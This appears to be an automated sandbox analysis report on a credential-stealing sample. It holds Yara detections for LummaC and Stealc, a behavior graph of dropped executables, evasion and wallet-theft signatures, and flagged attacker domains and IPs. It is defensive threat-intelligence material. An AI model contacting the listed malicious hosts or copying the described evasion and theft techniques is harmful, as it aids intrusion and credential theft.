Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Directory queried: C:\Users\user\Documents\EEGWXUHVUG
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Directory queried: C:\Users\user\Documents\JDDHMPCDUJ
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Directory queried: C:\Users\user\Documents\NWCXBPIUYI
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Directory queried: C:\Users\user\Documents\QCFWYSKMHA
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Directory queried: C:\Users\user\Documents\QNCYCDFIJJ
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Directory queried: C:\Users\user\Documents\QNCYCDFIJJ
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Directory queried: C:\Users\user\Documents\SFPUSAFIOL
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Directory queried: C:\Users\user\Documents\SFPUSAFIOL
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Directory queried: C:\Users\user\Documents\EEGWXUHVUG
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Directory queried: C:\Users\user\Documents\EEGWXUHVUG
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Directory queried: C:\Users\user\Documents\EOWRVPQCCS
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Directory queried: C:\Users\user\Documents\EWZCVGNOWT
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Directory queried: C:\Users\user\Documents\IPKGELNTQY
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Directory queried: C:\Users\user\Documents\JDDHMPCDUJ
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Directory queried: C:\Users\user\Documents\LSBIHQFDVT
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Directory queried: C:\Users\user\Documents\NWCXBPIUYI
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Directory queried: C:\Users\user\Documents\QCFWYSKMHA
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Directory queried: C:\Users\user\Documents\EEGWXUHVUG
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Directory queried: C:\Users\user\Documents\EOWRVPQCCS
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Directory queried: C:\Users\user\Documents\QCFWYSKMHA
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Directory queried: C:\Users\user\Documents\SFPUSAFIOL
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Directory queried: number of queries: 1474
Yara detected Credential Stealer
Source: Yara match File source: 13.3.26e226f915.exe.169ed50.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.3.26e226f915.exe.169ed50.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001C.00000003.3219630830.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.3198150791.000000000101F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.3173301010.000000000101F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.3141191649.00000000016AB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.3219630830.000000000101F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.3178327332.000000000101F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.3239956921.0000000001028000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.3047169433.00000000016B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 7160, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 26e226f915.exe PID: 4020, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 26e226f915.exe PID: 6764, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Credential Flusher
Source: Yara match File source: 0000000E.00000003.3097542418.000000000135F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 90bef5afae.exe PID: 5204, type: MEMORYSTR
Yara detected LummaC Stealer
Source: Yara match File source: Process Memory Space: file.exe PID: 7160, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 26e226f915.exe PID: 4020, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 26e226f915.exe PID: 6764, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Yara detected Stealc
Source: Yara match File source: 39.2.num.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.0.num.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 39.0.num.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.9NWW1UIUAOJA8NFOZHWEDA.exe.4a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.ef2532c0b1.exe.40000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.num.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.ef2532c0b1.exe.40000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001F.00000002.3104366518.0000000000181000.00000080.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.3089240746.0000000000181000.00000080.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.3013087261.0000000000041000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000003.3176264555.00000000049F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.2972676425.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2408818591.00000000004A1000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.3340338956.0000000001097000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.3222497122.0000000000041000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.3230829652.0000000000C9B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.3113201257.000000000129E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2368421842.0000000004E60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.3324835217.0000000004A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.3014293851.000000000159E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.3337452066.0000000000181000.00000080.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000000.3322904939.0000000000181000.00000080.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2416316812.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 9NWW1UIUAOJA8NFOZHWEDA.exe PID: 1340, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ef2532c0b1.exe PID: 1016, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\num[1].exe, type: DROPPED
Source: Yara match File source: dump.pcap, type: PCAP
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1541351 Sample: file.exe Startdate: 24/10/2024 Architecture: WINDOWS Score: 100 90 studennotediw.store 2->90 92 steamcommunity.com 2->92 94 39 other IPs or domains 2->94 112 Suricata IDS alerts for network traffic 2->112 114 Found malware configuration 2->114 116 Antivirus detection for dropped file 2->116 118 16 other signatures 2->118 9 file.exe 3 2->9         started        14 skotes.exe 4 25 2->14         started        16 26e226f915.exe 2->16         started        18 5 other processes 2->18 signatures3 process4 dnsIp5 96 sergei-esenin.com 104.21.53.8, 443, 49709, 49710 CLOUDFLARENETUS United States 9->96 98 steamcommunity.com 104.102.49.254, 443, 49708, 49995 AKAMAI-ASUS United States 9->98 100 185.215.113.16, 49744, 49994, 49997 WHOLESALECONNECTIONSNL Portugal 9->100 72 C:\Users\user\...\ST44OD0PMG8MCMYJRN4.exe, PE32 9->72 dropped 74 C:\Users\...\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe, PE32 9->74 dropped 76 C:\Users\user\...\9NWW1UIUAOJA8NFOZHWEDA.exe, PE32 9->76 dropped 154 Query firmware table information (likely to detect VMs) 9->154 156 Found many strings related to Crypto-Wallets (likely being stolen) 9->156 158 Tries to evade debugger and weak emulator (self modifying code) 9->158 174 2 other signatures 9->174 20 ST44OD0PMG8MCMYJRN4.exe 4 9->20         started        24 M0SHVBI03XTU9LNHD2O8UA8TC8F.exe 9 1 9->24         started        26 9NWW1UIUAOJA8NFOZHWEDA.exe 13 9->26         started        102 185.215.113.43, 49992, 49993, 49996 WHOLESALECONNECTIONSNL Portugal 14->102 78 C:\Users\user\AppData\Local\Temp\...\num.exe, PE32 14->78 dropped 88 7 other malicious files 14->88 dropped 160 Creates multiple autostart registry keys 14->160 162 Hides threads from debuggers 14->162 164 Tries to detect sandboxes / dynamic malware analysis system (registry check) 14->164 29 26e226f915.exe 14->29         started        31 ef2532c0b1.exe 14->31         started        35 2 other processes 14->35 80 C:\Users\user\...\PPP8FUHMDUG38MZT5OEEJAB.exe, PE32 16->80 dropped 82 C:\Users\...\J5ZZ1Y85CCQU7EF0IIBN6DLOUVMA.exe, PE32 16->82 dropped 84 C:\Users\...\1USEAVXFST1CCUTT4RKEBB0FQ1.exe, PE32 16->84 dropped 166 Tries to steal Crypto Currency Wallets 16->166 168 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 16->168 33 PPP8FUHMDUG38MZT5OEEJAB.exe 16->33         started        37 2 other processes 16->37 86 C:\...\TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe, PE32 18->86 dropped 170 Tries to harvest and steal ftp login credentials 18->170 172 Tries to harvest and steal browser information (history, passwords, etc) 18->172 39 7 other processes 18->39 file6 signatures7 process8 dnsIp9 70 C:\Users\user\AppData\Local\...\skotes.exe, PE32 20->70 dropped 120 Antivirus detection for dropped file 20->120 122 Detected unpacking (changes PE section rights) 20->122 124 Machine Learning detection for dropped file 20->124 126 Tries to detect virtualization through RDTSC time measurements 20->126 41 skotes.exe 20->41         started        128 Modifies windows update settings 24->128 130 Disables Windows Defender Tamper protection 24->130 132 Tries to evade debugger and weak emulator (self modifying code) 24->132 142 2 other signatures 24->142 104 185.215.113.37, 49819, 80 WHOLESALECONNECTIONSNL Portugal 26->104 134 Multi AV Scanner detection for dropped file 26->134 144 2 other signatures 26->144 136 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 29->136 138 Binary is likely a compiled AutoIt script file 35->138 44 taskkill.exe 35->44         started        46 taskkill.exe 35->46         started        48 taskkill.exe 35->48         started        56 3 other processes 35->56 106 youtube.com 142.250.185.206 GOOGLEUS United States 39->106 108 prod.detectportal.prod.cloudops.mozgcp.net 34.107.221.82 GOOGLEUS United States 39->108 110 5 other IPs or domains 39->110 140 Tries to detect sandboxes and other dynamic analysis tools (window names) 39->140 50 firefox.exe 39->50         started        52 firefox.exe 39->52         started        54 conhost.exe 39->54         started        58 4 other processes 39->58 file10 signatures11 process12 signatures13 146 Antivirus detection for dropped file 41->146 148 Detected unpacking (changes PE section rights) 41->148 150 Machine Learning detection for dropped file 41->150 152 4 other signatures 41->152 60 conhost.exe 44->60         started        62 conhost.exe 46->62         started        64 conhost.exe 48->64         started        66 conhost.exe 56->66         started        68 conhost.exe 56->68         started        process14
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
104.21.53.8
 sergei-esenin.com United States
13335 CLOUDFLARENETUS true
185.215.113.43
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
35.244.181.201
 prod.balrog.prod.cloudops.mozgcp.net United States
15169 GOOGLEUS false
142.250.185.206
 youtube.com United States
15169 GOOGLEUS false
34.117.188.166
 contile.services.mozilla.com United States
139070 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG false
185.215.113.37
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
104.102.49.254
 steamcommunity.com United States
16625 AKAMAI-ASUS true
185.215.113.16
 unknown Portugal
206894 WHOLESALECONNECTIONSNL false
35.190.72.216
 prod.classify-client.prod.webservices.mozgcp.net United States
15169 GOOGLEUS false
34.160.144.191
 prod.content-signature-chains.prod.webservices.mozgcp.net United States
2686 ATGS-MMD-ASUS false
34.107.221.82
 prod.detectportal.prod.cloudops.mozgcp.net United States
15169 GOOGLEUS false

Private

IP
127.0.0.1

Contacted Domains

Name IP Active
example.org 93.184.215.14 true
star-mini.c10r.facebook.com 157.240.251.35 true
prod.classify-client.prod.webservices.mozgcp.net 35.190.72.216 true
prod.balrog.prod.cloudops.mozgcp.net 35.244.181.201 true
twitter.com 104.244.42.1 true
prod.detectportal.prod.cloudops.mozgcp.net 34.107.221.82 true
sergei-esenin.com 104.21.53.8 true
dyna.wikimedia.org 185.15.59.224 true
prod.remote-settings.prod.webservices.mozgcp.net 34.149.100.209 true
contile.services.mozilla.com 34.117.188.166 true
youtube.com 142.250.185.206 true
prod.content-signature-chains.prod.webservices.mozgcp.net 34.160.144.191 true
youtube-ui.l.google.com 172.217.18.14 true
steamcommunity.com 104.102.49.254 true
us-west1.prod.sumo.prod.webservices.mozgcp.net 34.149.128.2 true
reddit.map.fastly.net 151.101.193.140 true
ipv4only.arpa 192.0.0.171 true
prod.ads.prod.webservices.mozgcp.net 34.117.188.166 true
push.services.mozilla.com 34.107.243.93 true
telemetry-incoming.r53-2.services.mozilla.com 34.120.208.123 true
www.reddit.com unknown unknown
spirittunek.store unknown unknown
spocs.getpocket.com unknown unknown
licendfilteo.site unknown unknown
content-signature-2.cdn.mozilla.net unknown unknown
support.mozilla.org unknown unknown
eaglepawnoy.store unknown unknown
firefox.settings.services.mozilla.com unknown unknown
www.youtube.com unknown unknown
www.facebook.com unknown unknown
bathdoomgaz.store unknown unknown
detectportal.firefox.com unknown unknown
studennotediw.store unknown unknown
mobbipenju.store unknown unknown
shavar.services.mozilla.com unknown unknown
clearancek.site unknown unknown
dissapoiznw.store unknown unknown
www.wikipedia.org unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
dissapoiznw.store true
    		unknown
    https://steamcommunity.com/profiles/76561199724331900 true
      		unknown